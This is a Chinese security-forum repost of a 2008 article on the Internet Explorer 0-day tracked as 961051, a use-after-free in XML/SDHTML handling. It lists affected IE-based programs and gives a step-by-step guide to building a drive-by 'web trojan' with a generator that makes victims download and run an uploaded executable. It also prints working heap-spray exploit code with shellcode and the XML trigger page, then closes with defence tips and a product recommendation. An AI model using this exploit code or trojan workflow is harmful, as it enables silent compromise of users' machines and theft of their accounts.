Board logo

标题: 张扬的0Day:黑客无规则的时代 [打印本页]

作者: 流淚╮鮭鮭    时间: 2009-1-1 17:27     标题: 张扬的0Day:黑客无规则的时代

 微软“Internet Explorer”爆出高危漏洞!如果算上所有的采用IE内核的第三方浏览器,在全球网络浏览器市场中,微软的Internet Explorer无疑是最庞大的一个舰队,根据统计数据显示,全球有近80%的电脑用户使用的是IE浏览器或者IE内核的第三方浏览器。12月9日,全球网站挂马攻击突然大增,网络用户极其危险;微软尚未推出补丁,该漏洞目前能够横扫一切使用IE7内核的浏览器;它利用网页传播,目前网络中以出现攻击程序与代码;虽然有点安全厂商推出了临时补丁,但是并不是所有的补丁都有效……这究竟是一个什么样的漏洞,为何会带来如此大的危险?
  将陷落百万用户的漏洞
  今年10月21日的微软黑屏和三天后被曝出的MS08-067漏洞强烈风暴似乎还没有完全过去,然而就在此时,又一个全新的0Day漏洞被黑客爆出,而且相比MS08-067而言,这个针对微软Internet Explorer 的新漏洞对于普通的上网用户而言更具有危险性。漏洞刚刚出现时,黑客仅仅是针对Internet Explorer 7发动攻击,而最新的微软报告和监控显示,黑客已经将漏洞扩展到IE4到IE8所有的版本。
  此前,黑客如果想通过MS08-067漏洞攻击用户,往往会遇到许多天然的障碍,特别是在互联网中的端口设置等等难题。但这个被微软命名为“961051”的IE 0Day则没有任何传播渠道的限制,黑客可以通过网页挂马的方式,将木马通过恶意网页代码挂到任何他能够进入的地区,可能会是某个大网站甚至门户网站的网页,可能会是QQ或迅雷新闻弹出口,也可能是PPLive等影视播放器的窗口,所有会调用IE内核的软件都可能被黑客利用,成为挂马钓鱼的诱饵,让用户在不知不觉之中受害。
  目前微软还没有为这个名为961051的IE 0Day漏洞推出相关补丁,而能够供黑客简易操作的IE 0Day攻击文件生成器却已经开始大范围的在互联网中流行。如今通过这些现成的生成器,任何一个稍有HTML网页制作技术的电脑用户就可以利用该漏洞挂马,制造和传播病毒。而由于该漏洞主要会被黑客挂在看似正常的网站和网页下,因此用户在浏览了黑客布下的陷阱网页后很可能不会察觉到自己已经被黑客攻击,这种隐蔽性很高的攻击将会大大的扩大受到此漏洞危害的用户数量,而使用IE浏览器的用户几乎都成为了该漏洞潜在的受害者。
  然而,最恐怖的并不仅仅是这些,由于IE浏览器是微软捆绑在Windows内的核心组件之一,因此目前许多大众经常使用的软件都会通过调用IE内核实现打开网页的功能,例如QQ用户在登陆QQ时自动弹出的迷你首页,就是通过调用IE内核实现的。但这些通过调用IE内核实现网页浏览的软件都会受到该0Day影响,黑客可以通过配合局域网ARP攻击,轻松的让所有调用IE内核的软件都可能成为挂马的武器,你的QQ、网游账号、网银账号、邮箱密码等等,则全是黑客眼中的猎物。
  一个张扬的0Day
  挖掘软件漏洞,在互联网安全中是一个古老的技艺,世界上第一个蠕虫病毒“莫里斯蠕虫”就是病毒制造者莫里斯通过挖到的UNIX漏洞进行传播的。在以往,黑客或者相关安全组织在挖掘到软件漏洞后,往往会第一时间通知软件开发商,并且在软件开发商开发出补丁前不会公布漏洞细节,这在安全行业是一个不成文的规矩。
  不过现如今,越来越多的黑客为了名声、金钱等个人利益,开始将自己挖掘出来的第一手漏洞立刻公开,让软件开发商和用户在面对危险时措手不及,更广泛的现象是将0Day悄悄的小范围转卖。这种颠覆了游戏规则的漏洞传播行为,让无数用户的电脑如同在互联网上敞开了大门,任凭黑客窃取抢劫他们感兴趣的信息。
  但是此次的IE 0Day更加张扬,这个0Day在被挖出后,很快被黑客标注了价格转卖,并且以惊人的速度公开流传到了互联网之中,微软也只是在监控到大范围攻击后,才得知黑客正在大范围的利用该漏洞进行攻击。但这个漏洞在互联网中公开的时机仍然值得推敲,因为12月9日之后的第二天就是微软每个月向全球定期发布安全公告和补丁的日子,这个漏洞在这一刻传遍了互联网,就意味着按照正常程序,这个漏洞的补丁需要在2009年1月6日才会发布。
  而在补丁发布之前的这一个月时间中,网络中各个大大小小的黑客有充分的机会传遍并制造各种基于该漏洞的攻击方式,而用户则束手无策,除非微软肯发布紧急补丁,这也是那些期望凭借此漏洞出名的黑客所期望的。然而直到我们完稿的那一刻,微软并没有发布紧急补丁,这个IE 0Day的定时****在每一个使用IE浏览器用户的电脑中嘀嗒作响着,危险不知何时会来到……
  IE 0Day危险的名单
  目前受到该漏洞影响,以下调用IE内核的软件都有可能成为黑客的目标:
  浏览器类
  提示:所有调用IE7内核的浏览器,在访问该0DAY恶意网站时,均会中招
  [1] Internet Explorer 7
  [2]遨游浏览器
  [3]世界之窗
  [4]腾讯TT浏览器
  [5]糖果浏览器
  [6]GreenBrowser
  邮件客户端软件
  提示:黑客会将恶意代码插在邮件中,当用户用HTML方式查看邮件是会中招
  [1]Outlook
  [2]Outlook Express
  [3]FoxMail
  [4] DreamMail
  下载软件
  [1]迅雷
  [2]网际快车
  [3]超级旋风
  [4]电驴
  [5]BT下载
  等
  提示:黑客会在局域网中利用ARP攻击的方式,将恶意代码插入到下载软件弹出或者内嵌的网页中
  影音播放
  [1]PPLive
  [2]PPS
  [3]RealPlayer
  [4]千千静听
  [5]酷狗播放
  等
  IM软件
  [1]腾讯QQ(迷你主页部分)
  [2]阿里淘宝旺旺(焦点资讯部分)
  [3]MSN(MSN资讯部分)
  等
  技术小百科:“0Day”——黑客发现软件漏洞后,软件厂商仍然没有推出补丁的攻击手段都可以被称之为0Day。对于普通电脑用户而言,0Day是最危险的隐患,在没有有效防御手段的情况下,你的电脑近乎如同在裸奔。但是他人的地狱也往往是自己的天堂,对于黑客而言0Day是最好的终极武器,因为这是一把可以穿透许多盾牌的利剑。
  祸起XML
  本次这个IE 0Day漏洞是由于SDHTML处理对象存在错误导致内存紊乱。造成这个问题主要原因是由于IE构造的某种条件可以使得SDHTML检测到错误释放已被分配的对象,但是释放已被分配的对象后SDHTML并未返回而是继续使用被释放的对象的内存执行,如果这些内存又被分配给其他用途,将导致SDHTML把这些内存当作一个对象来操作。
  黑客在利用该0DAY挂马时,使用XML的SRC字符串对象占用了释放对象的空间,导致了XML在解析字符串SRC片段时,SRC字符串当中的非正常字符对象分配失败,而失败后的内存指针没有被释放,这个指针可以被黑客指向了一段堆地址,如果这段地址被黑客构造的ShellCode恶意代码覆盖过的话,HTML文件中错误格式的标签可以导致微软IE浏览器使用已被释放的对象的内存作为虚函数指针进行调用,调用这个指针就会导致有溢出。最终导致代码执行成功,利用该漏洞可以执行任意代码。
  小知识:扩展标记语言XML是(eXtensible Markup Language)一种简单的数据存储语言,使用一系列简单的标记描述数据,而这些标记可以用方便的方式建立,虽然XML占用的空间比二进制数据要占用更多的空间,但XML极其简单易于掌握和使用。
  再现黑客IE 0Day挂马现场
  本次IE 0Day来势汹汹让人非常吃惊,特别是0Day如此快地就从精英黑客圈流到了民间,这个0Day也导致了新一轮网站攻击的大潮,近期许多黑客都希望通过攻陷大网站,并在攻陷的网站网页中挂马,来扩大自己的肉鸡群。
  近期较为知名的是Dr.web大蜘蛛杀毒软件与技升主板的中文官方网站被攻陷,在这两个被黑客攻陷的网站中,黑客均利用了这个最新的IE 0Day漏洞在网站中挂马,目前虽然受害用户数量不明。鉴于今后一段时间里,这个 IE 0Day漏洞的广泛威胁性,所以今天我们为读者详细的演示一下这个漏洞是如何被黑客利用的。
  第一步:首先准备好一个程序或者木马的服务端,将该程序上传到自己的网站中,我们假设的网站是“http://www.test.com/”,上传到根目录后将程序名重命名为“ko.exe”。
  第二步:然后打开“IE 0Day木马生成器”,需要说明的是,不同的作者会开发出名字不同的生成器,我们目前使用的是“甲壳虫版生成器”。在弹出的生成器程序窗口中输入我们刚才上传的木马地址“http://www.test.com/ ko.exe”,之后点击生成按键(图1)。


  图1
  第三步:此时生成器所在的目录中会生成一个HTML的网页文件,在系统默认浏览器为IE的情况下双击这个HTML文件后,IE浏览器在打开这个文件后会弹出一个ActiveX窗口,用户点击为“是”后(图2),我们上传到网站上的指定木马就会下载运行,在运行IE 0Day的过程中,有时系统会出现错误崩溃的现象。在运行后,我们打开Windows任务管理器,即可看到“ko.exe”的进程正在运行(图3)。

                                    图2

                                                               图3
  第四步:黑客此时只需要将测试号的HTML文件重命名为自己指定的名称,然后上传到特定的网站,就完成了一个可以传播的网页木马的全部制作过程。
  第五步:作为普通读者,我们不建议大家都用木马生成器进行测试,毕竟上述动作非常危险,我们为大家提供了一组代码,您只需要将这段代码输入到写字板中,然后另存为HTML后缀的文件,双击运行该HTML文件后,同样会体验到该0Day溢出,只不过这个溢出不会去调用远程的木马,只是启动了你系统中的计算器程序(图4)。


  图4
  Code代码:
  <html><script>
  Var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
  var block = unescape("%u0c0c%u0c0c");
  var nops = unescape("%u9090%u9090%u9090");
  while (block.length < 81920) block = block;
  var memory = new Array();
  var i=0;
  for (;i<1000;i ) memory = (block nops shellcode);
  document.write("<iframe src=\"iframe.html\">");
  </script>
  </html>
  <!-- iframe.html
  <XML ID=I>
  <X> <C> <![CDATA[<image SRC=http://ఌఌ.xxxxx.org > ]]>
  </C> </X>
  </XML>
  <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
  <XML ID=I> </XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> </SPAN>
  </SPAN>
  -->
  防范方法:
  0Day启用防挂马程序
  由于目前微软并没有发布紧急漏洞补丁,因此根据微软正常的补丁升级程序,用户需要等到明年一月份第二个星期的星期三,在太平洋时间上午11点才会正式发布针对上一个月的补丁程序。
  在微软没有发布正式补丁前,已经有一批安全厂商发布了自己开发的山寨版IE 0Day补丁,但是我们并不建议用户使用这些补丁。首先是这些补丁的安全性并不能够保证,很多补丁都通过做粗糙的修改进行防堵。此外很多用山寨补丁修补后的系统,并不能够完全防堵住这个漏洞,在我们的测试中,其中一款程序加密生成的网页就成功的在打过360版补丁的系统中正常运行了。
  因此我们建议用户使用杀毒软件或者专门的防挂马软件进行防御,经过我们测试免费防挂马《锐甲》在防范该IE 0Day攻击时非常有效。大家可以登陆“http://www.araymor.com/download.html”下载锐甲,安装后即可防范各种网页挂马(图5)。


                                                              图5
  目前微软发布了12月份的8篇安全公告,这些公告描述并修复了28个安全漏洞,其中23个漏洞属于“紧急”风险级别,这个级别的风险漏洞意味着攻击者可能利用这些漏洞远程入侵并完全控制客户端系统。我们强烈建议使用Windows操作系统的用户立刻检查一下您的系统是否受此漏洞影响,并按照我们提供的解决方法予以解决。
  编后:由于黑客利用该IE7 0Day漏洞最好的方式就是通过用户信任的网站进行挂马,因此相信未来的一段日子,针对一些网站的SQL注入行为将大范围重现,特别是新的针对PHP和JSP网站的高级注入行为,当然网站安全性较差的中小企业网站将会是此次全球网站攻击浪潮的主要受害者。由于该IE7 0Day漏洞的攻击代码产生变种的方式有多种,因此利用该IE7 0Day漏洞的攻击行为相信将会持续一段时间,加之年末将迎来圣诞与新年假期,黑客们很可能利用这个IE7 0Day漏洞制作成诱惑性较强的网页贺卡或者电子邮件广泛传播。

本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接:http://www.hackbase.com/news/2008-12-26/21605.html




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2